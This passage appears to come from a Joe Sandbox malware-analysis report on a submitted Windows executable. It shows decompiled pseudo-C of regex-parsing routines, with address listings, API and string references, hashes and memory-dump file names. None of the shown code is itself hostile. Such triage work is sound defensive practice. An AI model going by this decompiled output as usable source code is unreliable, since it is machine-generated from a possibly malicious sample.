								if(_t325 == 0) {
									 *0x41720c();
									asm("sbb ecx, ecx");
									_t216 = E004090FF(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x24)) + 0xf)) - 1);
									_t341 = _t341 + 0xc;
									__eflags = _t216;
									 *(_t338 - 0x1c) = _t216;
									if(_t216 == 0) {
										 *((char*)(_t338 - 0x40)) =  *((intOrPtr*)(_t338 + 0x13));
										 *0x417230(0);
										_t337 = "invalid backreference in substitution";
										 *0x417234(_t337, strlen(_t337));
										 *(_t338 - 4) = 0;
										E00404FA7(_t338 - 0x78, _t338 - 0x40);
										_push(0x4196f8);
										_push(_t338 - 0x78);
										 *((intOrPtr*)(_t338 - 0x78)) = 0x417698;
										L004153FE();
										L50:
										 *((char*)(_t338 - 0x54)) =  *((intOrPtr*)(_t338 + 0x13));
										 *0x417230(0);
										_t336 = "expecting escape sequence in substitution string";
										 *0x417234(_t336, strlen(_t336));
										 *(_t338 - 4) = 1;
										E00404FA7(_t338 - 0x94, _t338 - 0x54);
										_t158 = _t338 - 0x94;
										_push(0x4196f8);
										_push(_t158);
										 *(_t338 - 0x94) = 0x417698;
										L004153FE();
									} else {
										 *0x41720c();
										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
										__eflags =  *(_t338 - 0x10);
										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
										if( *(_t338 - 0x10) != 0) {
											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
										}
										 *(_t338 - 0x18) = 1;
										 *(_t338 - 0x14) =  *(_t338 - 0x1c);
										goto L21;
									}
								} else {
									_t329 = _t325 - 1;
									if(_t329 == 0) {
										 *0x41720c();
										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
										__eflags =  *(_t338 - 0x10);
										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
										if( *(_t338 - 0x10) != 0) {
											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
										}
										 *(_t338 - 0x14) =  *(_t338 - 0x14) | 0xffffffff;
										 *(_t338 - 0x18) = 1;
										goto L21;
									} else {
										if(_t329 != 1) {
											L31:
											 *(_t338 - 0x10) =  *(_t338 - 0x10) + 1;
											 *(_t338 + 8) =  *(_t338 + 8) + 1;
											continue;
										} else {
											 *0x41720c();
											_t324 =  *(_t338 + 8) -  *(_t334 + 4);
											 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
											if( *(_t338 - 0x10) != 0) {
												E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
											}
											 *(_t338 - 0x18) = 1;
											 *(_t338 - 0x14) = 0xfffffffe;
											L21:
											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
											 *(_t338 - 0x18) = 0;
											 *(_t338 - 0x14) = _t324;
											while(1) {
												L1:
												 *(_t338 - 0x10) = 0;
												goto L2;
											}
										}
									}
									L54:
								}
							}
						}
						break;
					}
					__eflags =  *(_t338 - 0x10);
					if( *(_t338 - 0x10) != 0) {
						_t158 = E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t338 - 0xc));
					return _t158;
					goto L54;
				}
			}

0x004061c3
0x004061c8
0x004061d0
0x004061d8
0x004061db
0x004061e6
0x004061ec
0x004061f2
0x004061f5
0x004061f8
0x004061fa
0x004061fa
0x004061fa
0x004061fd
0x004061fd
0x004061ff
0x00406205
0x00406211
0x00406218
0x00000000
0x00000000
0x00406220
0x00406232
0x00406243
0x00406245
0x00406248
0x00406382
0x00406385
0x004064cc
0x004064d2
0x004064de
0x004064e2
0x004064e5
0x00000000
0x004064eb
0x004064eb
0x004064ee
0x004064ff
0x004064ff
0x00406509
0x0040650f
0x00406515
0x0040651c
0x00000000
0x0040651c
0x0040638b
0x0040638b
0x0040638e
0x004063f2
0x004063f5
0x00406406
0x00406406
0x0040640d
0x00406413
0x00406418
0x00406418
0x0040641b
0x0040641e
0x00406420
0x00406423
0x00406429
0x00406435
0x00406439
0x0040643c
0x00000000
0x00000000
0x00406440
0x00406452
0x00406463
0x00406465
0x00406467
0x00406470
0x00406470
0x00406470
0x00000000
0x00406469
0x00406469
0x0040646c
0x00406473
0x00406473
0x00000000
0x00406473
0x0040646c
0x00000000
0x00406467
0x0040647a
0x00406486
0x00406486
0x00406489
0x0040648c
0x0040649d
0x0040649d
0x004064a4
0x004064a5
0x004064a7
0x00000000
0x004064ad
0x004064ad
0x004064b0
0x004064b6
0x004064c0
0x004064c1
0x004064c2
0x00000000
0x004064c2
0x00406390
0x00406390
0x00000000
0x00406392
0x00406392
0x00406395
0x00000000
0x00406397
0x00406397
0x0040639a
0x004063ab
0x004063ab
0x004063b0
0x004063b6
0x004063b7
0x004063c1
0x004063c4
0x004063c5
0x004063c8
0x004063c8
0x004063c9
0x004063ce
0x004063d0
0x004063d3
0x004063df
0x00000000
0x004063df
0x00406395
0x00406390
0x00000000
0x0040638e
0x0040624e
0x0040624e
0x0040633e
0x0040634a
0x0040634d
0x00406350
0x00406353
0x0040635c
0x0040635c
0x00406361
0x00406368
0x00000000
0x00406254
0x00406254
0x00406257
0x004062d8
0x004062ec
0x004062f5
0x004062fa
0x004062fd
0x004062ff
0x00406302
0x0040652b
0x0040652e
0x00406534
0x00406545
0x00406552
0x00406555
0x0040655d
0x00406562
0x00406563
0x0040656a
0x0040656f
0x00406576
0x00406579
0x0040657f
0x00406590
0x004065a0
0x004065a7
0x004065ac
0x004065b2
0x004065b7
0x004065b8
0x004065c2
0x00406308
0x0040630a
0x00406316
0x00406319
0x0040631c
0x0040631f
0x00406328
0x00406328
0x00406330
0x00406337
0x00000000
0x00406337
0x00406259
0x00406259
0x0040625a
0x0040629d
0x004062a9
0x004062ac
0x004062af
0x004062b2
0x004062bb
0x004062bb
0x004062c0
0x004062c4
0x00000000
0x0040625c
0x0040625d
0x004063e7
0x004063e7
0x004063ea
0x00000000
0x00406263
0x00406265
0x00406271
0x00406277
0x0040627a
0x00406283
0x00406283
0x00406288
0x0040628f
0x0040636b
0x00406372
0x00406377
0x0040637a
0x004061fa
0x004061fa
0x004061fa
0x00000000
0x004061fa
0x004061fa
0x0040625d
0x00000000
0x0040625a
0x00406257
0x0040624e
0x00000000
0x00406248
0x004065c7
0x004065ca
0x004065db
0x004065db
0x004065e6
0x004065ee
0x00000000
0x004065ee

APIs

_EH_prolog.MSVCRT ref: 004061C3
strlen.MSVCRT ref: 0040653A
_CxxThrowException.MSVCRT(?,004196F8), ref: 0040656A
strlen.MSVCRT ref: 00406585
_CxxThrowException.MSVCRT(?,004196F8), ref: 004065C2

Strings

expecting escape sequence in substitution string, xrefs: 0040657F, 00406584, 0040658C
invalid backreference in substitution, xrefs: 00406534, 00406539, 00406541

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionThrowstrlen$H_prolog
String ID: expecting escape sequence in substitution string$invalid backreference in substitution
API String ID: 875129476-967196223
Opcode ID: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
Instruction ID: 3761f46dd23904d97e1b94dca212cf1cba20719bb6d9752a604dd134c7b2255e
Opcode Fuzzy Hash: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
Instruction Fuzzy Hash: 5CE14271A0060ADFCF14DFA8C8949EEBBB5FF44300F11852EE917A7281D778AA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004050B8 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 339
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E004050B8(intOrPtr __ecx) {
				signed int _t484;
				char _t487;
				intOrPtr _t490;
				void* _t516;
				signed int* _t518;
				signed int _t534;
				signed int _t535;
				void* _t560;
				signed int* _t561;
				void* _t563;
				char* _t567;
				void* _t568;

				L004153D0();
				_t564 = __ecx;
				 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0;
				 *((intOrPtr*)(_t568 - 0x10)) = __ecx;
				 *(_t568 - 0x20) = 0;
				 *(_t568 - 0x30) =  *(_t568 - 0x30) & 0;
				 *(_t568 - 4) = 0;
				 *((intOrPtr*)(_t568 - 0x2c)) = 0;
				_t561 =  *(_t568 + 0x10);
				 *(_t568 - 0x34) =  *(_t568 - 0x34) & 0;
				_t517 =  *(__ecx + 0x27);
				 *(_t568 - 4) = 1;
				 *((char*)(_t568 + 0x13)) = ( *_t561 & 0x00000100) == 0x100;
				 *0x41720c(_t560, _t563, _t516);
				_t518 =  *(_t568 + 8);
				asm("sbb ecx, ecx");
				if(( ~(( *(__ecx + 0x27))[1]) & _t517[2] + ( *(__ecx + 0x27))[1]) !=  *_t518) {
					 *(_t568 + 8) =  *(__ecx + 0x27);
					 *0x41720c();
					asm("sbb edx, edx");
					_t484 = E00406B23(_t561, _t518,  ~(( *(_t568 + 8))[1]) & ( *(_t568 + 8))[2] + ( *(_t568 + 8))[1]);
					__eflags = _t484 - 0x21;
					if(__eflags > 0) {
						L18:
						__eflags =  *(_t568 - 0x20);
						if( *(_t568 - 0x20) != 0) {
							_push(_t561);
							_push( *(_t568 - 0x34));
							_push(_t518);
							_push(_t568 - 0x24);
							E00408D03(_t564);
							_t490 =  *((intOrPtr*)(_t568 + 0xc));
							_t534 =  *(_t568 - 0x20);
							 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0x00000000;
							 *( *(_t490 + 0x1c)) = _t534;
							_t535 = _t534 + 4;
							__eflags = _t535;
							 *(_t490 + 0x1c) = _t535;
						}
						L20:
						 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
						E0040C5ED(_t568 - 0x30);
						_t101 = _t568 - 4;
						 *_t101 =  *(_t568 - 4) | 0xffffffff;
						__eflags =  *_t101;
						E00406ED3(_t568 - 0x24);
						_t487 = 1;
						goto L21;
					}
					switch( *((intOrPtr*)(_t484 * 4 +  &M00405D48))) {
						case 0:
							 *(_t568 + 0x10) =  *(__ecx + 0x27);
							 *0x41720c();
							_t492 =  *(_t568 + 0x10);
							_t537 = _t492[1];
							asm("sbb edx, edx");
							__eflags = ( ~_t537 & _t492[2] + _t537) -  *_t518;
							if(( ~_t537 & _t492[2] + _t537) !=  *_t518) {
								_push(_t561);
								_push( *((intOrPtr*)(_t568 + 0xc)));
								_push(_t518);
								E00405EEA(__ecx);
								goto L15;
							}
							_t498 =  *((intOrPtr*)(_t568 + 0xc));
							__eflags =  *(_t498 + 0x10);
							if( *(_t498 + 0x10) == 0) {
								goto L10;
							}
							_push(0);
							 *((char*)(_t568 - 0x64)) =  *((intOrPtr*)(_t568 + 0xf));
							 *0x417230();
							_t566 = "mismatched parenthesis";
							_push(strlen(_t566));
							_push(_t566);
							 *0x417234();
							 *(_t568 - 4) = 3;
							E00404FA7(_t568 - 0x9c, _t568 - 0x64);
							 *((intOrPtr*)(_t568 - 0x9c)) = 0x417698;
							_push(0x4196f8);
							_t505 = _t568 - 0x9c;
							goto L9;
						case 1:
							__ecx = __esi;
							__eax = E00404705(__ecx, __ebx,  *(__ebp + 0xc), __edi,  *(__ebp + 0x14));
							__eflags = __eax;
							_t82 = __eax != 0;
							__eflags = _t82;
							__ecx = __ecx & 0xffffff00 | _t82;
							 *(__ebp - 0x10) = __eax;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							__eax = E00406ED3(__ecx);
							 *((char*)(__ebp - 0x34)) = 1;
							goto L18;
						case 2:
							__eax =  *(__ebp + 0xc);
							__eflags =  *(__eax + 0x10);
							if( *(__eax + 0x10) != 0) {
								L10:
								_t520 = 0;
								goto L16;
							}
							__al =  *((intOrPtr*)(__ebp + 0xf));
							_push(0);
							__ecx = __ebp - 0x44;
							 *(__ebp - 0x44) =  *((intOrPtr*)(__ebp + 0xf));
							__eax =  *0x417230();
							__esi = "mismatched parenthesis";
							__eax = strlen(__esi);
							_pop(__ecx);
							_push(__eax);
							_push(__esi);
							__ecx = __ebp - 0x44;
							 *0x417234() = __ebp - 0x44;
							__ecx = __ebp - 0xd4;
							 *((char*)(__ebp - 4)) = 4;
							__eax = E00404FA7(__ecx, __ebp - 0x44);
							 *(__ebp - 0xd4) = 0x417698;
							_push(0x4196f8);
							__eax = __ebp - 0xd4;
							L9:
							_push(_t505);
							L004153FE();
							goto L10;
						case 3:
							__esi =  *(__ebp + 0xc);
							__ecx = __esi;
							 *__esi =  *((intOrPtr*)( *__esi + 0x38))();
							__ecx = __esi[0x1c];
							 *(__esi[0x1c]) =  *__esi;
							__ecx = __esi;
							__eax = E00406F41(__ecx);
							L15:
							_t520 = 1;
							L16:
							 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
							E0040C5ED(_t568 - 0x30);
							 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
							E00406ED3(_t568 - 0x24);
							_t487 = _t520;
							goto L21;
						case 4:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E00409233( *__edi,  &(__esi[4]));
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 5:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E0040927C( *__edi,  &(__esi[4]));
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 6:
							__ecx = __esi[4];
							__eax = E0040507F(__ecx, 0x40);
							 *(__ebp + 0x10) = __eax;
							 *(__ebp + 8) = __eax;
							__eflags = __eax;
							 *((char*)(__ebp - 4)) = 5;
							if(__eax == 0) {
								__eax = 0;
								__eflags = 0;
							} else {
								__ecx =  *(__ebp + 0x10);
								__eax =  &(__esi[4]);
								_push( &(__esi[4]));
								__eax = E00405DE3(__ecx);
								__eax =  *(__ebp + 0x10);
								 *__eax = 0x4177a0;
							}
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							 *(__ebp - 0x10) = __eax;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x30;
							 *((char*)(__ebp - 4)) = 1;
							__eax = E0040BFD3(__ebp - 0x30, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							__eax = E0040C5ED(__ebp - 0x14);
							__ecx = __esi[0x27];
							 *(__ebp + 0x10) = __esi[0x27];
							__eax =  *0x41720c();
							__eax =  *(__ebp + 0x10);
							__ecx =  *(__eax + 4);
							__eax =  *(__eax + 8);
							__edx = __ecx;
							__eax = __eax + __ecx;
							__edx =  ~__ecx;
							asm("sbb edx, edx");
							__edx =  ~__ecx & __eax;
							__ebp - 0x30 = E004092C5(__ebx, __ebp - 0x30, __ebx, __edx, __edi);
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push(__ecx);
							_push( *__edi);
							_push( *((intOrPtr*)(__ebp - 0x2c)));
							__eax = E00409941(__ecx);
							__esp = __esp + 0x1c;
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							__eax = E00406ED3(__ecx);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							goto L18;
						case 7:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E004099FB( *__edi,  &(__esi[4]));
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 8:
							__ecx = __esi[0x27];
							 *(__ebp + 8) = __esi[0x27];
							__eax =  *0x41720c();
							__eax =  *(__ebp + 8);
							__ecx =  *(__eax + 4);
							__eax =  *(__eax + 8);
							__edx = __ecx;
							__eax = __eax + __ecx;
							__edx =  ~__ecx;
							asm("sbb edx, edx");
							__edx =  ~__ecx & __eax;
							__eax =  *__ebx;
							__eflags = __edx - __eax;
							if(__edx != __eax) {
								__cl =  *__eax;
								__eflags = __cl - 0x30;
								if(__cl < 0x30) {
									L57:
									__eflags = __cl - 0x65;
									if(__cl != 0x65) {
										__eflags = __cl - 0x78;
										if(__cl != 0x78) {
											__eflags = __cl - 0x63;
											if(__cl != 0x63) {
												__eflags = __cl - 0x61;
												if(__cl != 0x61) {
													L80:
													__eflags = __cl - 0x66;
													if(__cl != 0x66) {
														L83:
														__eflags = __cl - 0x6e;
														if(__cl != 0x6e) {
															L86:
															__eflags = __cl - 0x72;
															if(__cl != 0x72) {
																L89:
																__eflags = __cl - 0x74;
																if(__cl != 0x74) {
																	L92:
																	__eflags = __cl - 0x5c;
																	if(__cl != 0x5c) {
																		L96:
																		_push(__edi);
																		_push(__ecx);
																		__eax = E00409CBB();
																		_pop(__ecx);
																		__eflags = __eax;
																		_pop(__ecx);
																		if(__eax == 0) {
																			__eax =  *__edi;
																			__ecx =  &(__esi[4]);
																			__eax =  *__ebx;
																			__al =  *( *__ebx);
																			__eax = E00409BC5(__esi,  *__ebx,  *__edi,  &(__esi[4]));
																			 *(__ebp - 0x10) = __eax;
																			__eflags = __eax;
																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
																			__eax = __ebp - 0x14;
																			 *(__ebp - 0x14) = __cl;
																			__ecx = __ebp - 0x24;
																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																			__ecx = __ebp - 0x14;
																		} else {
																			__ecx =  *__edi;
																			__edx =  &(__esi[4]);
																			__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
																			 *(__ebp - 0x10) = __eax;
																			__eflags = __eax;
																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
																			__eax = __ebp - 0x14;
																			 *(__ebp - 0x14) = __cl;
																			__ecx = __ebp - 0x24;
																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																			__ecx = __ebp - 0x14;
																		}
																		L44:
																		__eax = E00406ED3(__ecx);
																		 *__ebx =  *__ebx + 1;
																		goto L18;
																	}
																	__eflags =  *(__ebp + 0x13);
																	if( *(__ebp + 0x13) == 0) {
																		goto L96;
																	}
																	__eax = __eax + 1;
																	__ecx =  &(__esi[4]);
																	 *__ebx = __eax;
																	__eax =  *__edi;
																	__eax = E00409BC5(__esi, 0x5c,  *__edi,  &(__esi[4]));
																	 *(__ebp - 0x10) = __eax;
																	__eflags = __eax;
																	_t420 = __eax != 0;
																	__eflags = _t420;
																	__ecx = __ecx & 0xffffff00 | _t420;
																	__eax = __ebp - 0x14;
																	 *(__ebp - 0x14) = __cl;
																	__ecx = __ebp - 0x24;
																	__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																	__ecx = __ebp - 0x14;
																	goto L95;
																}
																__eflags =  *(__ebp + 0x13);
																if( *(__ebp + 0x13) == 0) {
																	goto L92;
																}
																__eax = __eax + 1;
																__ecx =  &(__esi[4]);
																 *__ebx = __eax;
																__eax =  *__edi;
																__eax = E00409BC5(__esi, 9,  *__edi,  &(__esi[4]));
																 *(__ebp - 0x10) = __eax;
																__eflags = __eax;
																__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
																__eax = __ebp - 0x14;
																 *(__ebp - 0x14) = __cl;
																__ecx = __ebp - 0x24;
																__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																__ecx = __ebp - 0x14;
																goto L95;
															}
															__eflags =  *(__ebp + 0x13);
															if( *(__ebp + 0x13) == 0) {
																goto L89;
															}
															__eax = __eax + 1;
															__ecx =  &(__esi[4]);
															 *__ebx = __eax;
															__eax =  *__edi;
															__eax = E00409BC5(__esi, 0xd,  *__edi,  &(__esi[4]));
															 *(__ebp - 0x10) = __eax;
															__eflags = __eax;
															__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
															__eax = __ebp - 0x14;
															 *(__ebp - 0x14) = __cl;
															__ecx = __ebp - 0x24;
															__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
															__ecx = __ebp - 0x14;
															goto L95;
														}
														__eflags =  *(__ebp + 0x13);
														if( *(__ebp + 0x13) == 0) {
															goto L86;
														}
														__eax = __eax + 1;
														__ecx =  &(__esi[4]);
														 *__ebx = __eax;
														__eax =  *__edi;
														__eax = E00409BC5(__esi, 0xa,  *__edi,  &(__esi[4]));
														 *(__ebp - 0x10) = __eax;
														__eflags = __eax;
														__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
														__eax = __ebp - 0x14;
														 *(__ebp - 0x14) = __cl;
														__ecx = __ebp - 0x24;
														__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
														__ecx = __ebp - 0x14;
														goto L95;
													}
													__eflags =  *(__ebp + 0x13);
													if( *(__ebp + 0x13) == 0) {
														goto L83;
													}
													__eax = __eax + 1;
													__ecx =  &(__esi[4]);
													 *__ebx = __eax;
													__eax =  *__edi;
													__eax = E00409BC5(__esi, 0xc,  *__edi,  &(__esi[4]));
													 *(__ebp - 0x10) = __eax;
													__eflags = __eax;
													__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = __cl;
													__ecx = __ebp - 0x24;
													__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
													__ecx = __ebp - 0x14;
													goto L95;
												}
												__eflags =  *(__ebp + 0x13);
												if( *(__ebp + 0x13) == 0) {
													goto L80;
												}
												__eax = __eax + 1;
												__ecx =  &(__esi[4]);
												 *__ebx = __eax;
												__eax =  *__edi;
												__eax = E00409BC5(__esi, 7,  *__edi,  &(__esi[4]));
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = __cl;
												__ecx = __ebp - 0x24;
												__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
												__ecx = __ebp - 0x14;
												goto L95;
											}
											__ecx = __esi[0x27];
											 *(__ebp + 0x10) = __esi[0x27];
											__eax =  *0x41720c();
											__eax =  *(__ebp + 0x10);
											__ecx =  *(__eax + 4);
											 *__ebx =  *__ebx + 1;
											__eax =  *(__eax + 8);
											__edx = __ecx;
											__eax = __eax + __ecx;
											__ecx =  *__ebx;
											__edx =  ~__edx;
											asm("sbb edx, edx");
											__edx = __edx & __eax;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__al =  *((intOrPtr*)(__ebp + 0xf));
												_push(0);
												__ecx = __ebp - 0x54;
												 *(__ebp - 0x54) =  *((intOrPtr*)(__ebp + 0xf));
												__eax =  *0x417230();
												__esi = "incomplete escape sequence \\c";
												__eax = strlen(__esi);
												_pop(__ecx);
												_push(__eax);
												_push(__esi);
												__ecx = __ebp - 0x54;
												 *0x417234() = __ebp - 0x54;
												__ecx = __ebp - 0xb8;
												 *((char*)(__ebp - 4)) = 6;
												E00404FA7(__ecx, __ebp - 0x54) = __ebp - 0xb8;
												_push(0x4196f8);
												_push(__ebp - 0xb8);
												 *(__ebp - 0xb8) = 0x417698;
												L004153FE();
											}
											__al =  *__ecx;
											__ecx = __ecx + 1;
											__eflags = __al - 0x61;
											 *__ebx = __ecx;
											if(__al >= 0x61) {
												__eflags = __al - 0x7a;
												if(__al <= 0x7a) {
													__eax = __al;
													_push(__al);
													__eax =  *0x4172a4();
													_pop(__ecx);
												}
											}
											__ecx =  *__edi;
											__edx =  &(__esi[4]);
											__al = __al ^ 0x00000040;
											__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
											 *(__ebp - 0x10) = __eax;
											__eflags = __eax;
											__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
											__eax = __ebp - 0x14;
											 *(__ebp - 0x14) = __cl;
											__ecx = __ebp - 0x24;
											__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
											__ecx = __ebp - 0x14;
											goto L95;
										}
										 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
										 *(__ebp + 0x13) =  *(__ebp + 0x13) & 0x00000000;
										__eax = __eax + 1;
										__eflags = __eax;
										 *__ebx = __eax;
										while(1) {
											__ecx = __esi[0x27];
											 *(__ebp + 0x14) = __esi[0x27];
											__eax =  *0x41720c();
											__eax =  *(__ebp + 0x14);
											__ecx =  *(__eax + 4);
											__eax =  *(__eax + 8);
											__edx = __ecx;
											__eax = __eax + __ecx;
											__edx =  ~__ecx;
											asm("sbb edx, edx");
											__edx =  ~__ecx & __eax;
											__eax =  *__ebx;
											__eflags = __edx - __eax;
											if(__edx == __eax) {
												break;
											}
											__al =  *__eax;
											__eflags = __al - 0x30;
											if(__al < 0x30) {
												L64:
												__eflags = __al - 0x61;
												if(__al < 0x61) {
													L66:
													__eflags = __al - 0x41;
													if(__al < 0x41) {
														break;
													}
													__eflags = __al - 0x46;
													if(__al > 0x46) {
														break;
													}
													L68:
													__eax = E00402FBD(__eax);
													__cl =  *(__ebp + 8);
													__cl =  *(__ebp + 8) << 4;
													__al = __al + __cl;
													 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
													 *__ebx =  *__ebx + 1;
													__eflags =  *(__ebp + 0x13) - 2;
													 *(__ebp + 8) = __al;
													if( *(__ebp + 0x13) < 2) {
														continue;
													}
													break;
												}
												__eflags = __al - 0x66;
												if(__al <= 0x66) {
													goto L68;
												}
												goto L66;
											}
											__eflags = __al - 0x39;
											if(__al <= 0x39) {
												goto L68;
											}
											goto L64;
										}
										__eax =  *__edi;
										__ecx =  &(__esi[4]);
										__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
										 *(__ebp - 0x10) = __eax;
										__eflags = __eax;
										__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
										__eax = __ebp - 0x14;
										 *(__ebp - 0x14) = __cl;
										__ecx = __ebp - 0x24;
										__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
										__ecx = __ebp - 0x14;
										goto L95;
									}
									__eax = __eax + 1;
									__ecx =  &(__esi[4]);
									 *__ebx = __eax;
									__eax =  *__edi;
									__eax = E00409BC5(__esi, 0x1b,  *__edi,  &(__esi[4]));
									 *(__ebp - 0x10) = __eax;
									__eflags = __eax;
									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
									__eax = __ebp - 0x14;
									 *(__ebp - 0x14) = __cl;
									__ecx = __ebp - 0x24;
									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
									__ecx = __ebp - 0x14;
									goto L95;
								}
								__eflags = __cl - 0x39;
								if(__cl > 0x39) {
									goto L57;
								}
								__ecx = __esi[0x27];
								 *(__ebp - 0x28) = __eax;
								 *(__ebp + 0x10) = __esi[0x27];
								__eax =  *0x41720c();
								__eax =  *(__ebp + 0x10);
								__ecx =  *(__eax + 4);
								__eax =  *(__eax + 8);
								__edx = __ecx;
								__eax = __eax + __ecx;
								__edx =  ~__ecx;
								asm("sbb edx, edx");
								__edx =  ~__ecx & __eax;
								__eax = __ebp - 0x28;
								__eax = E004090FF(__ebp - 0x28, __edx, 0x3e7);
								__ecx =  *__ebx;
								__eflags =  *( *__ebx) - 0x30;
								if( *( *__ebx) == 0x30) {
									L51:
									 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
									_t297 = __ebp + 0x13;
									 *_t297 =  *(__ebp + 0x13) & 0x00000000;
									__eflags =  *_t297;
									while(1) {
										__ecx = __esi[0x27];
										 *(__ebp + 0x14) = __esi[0x27];
										__eax =  *0x41720c();
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__eax + 4);
										__eax =  *(__eax + 8);
										__edx = __ecx;
										__eax = __eax + __ecx;
										__edx =  ~__ecx;
										asm("sbb edx, edx");
										__edx =  ~__ecx & __eax;
										__eax =  *__ebx;
										__eflags = __edx - __eax;
										if(__edx == __eax) {
											break;
										}
										__cl =  *__eax;
										__eflags = __cl - 0x30;
										if(__cl < 0x30) {
											break;
										}
										__eflags = __cl - 0x37;
										if(__cl > 0x37) {
											break;
										}
										 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
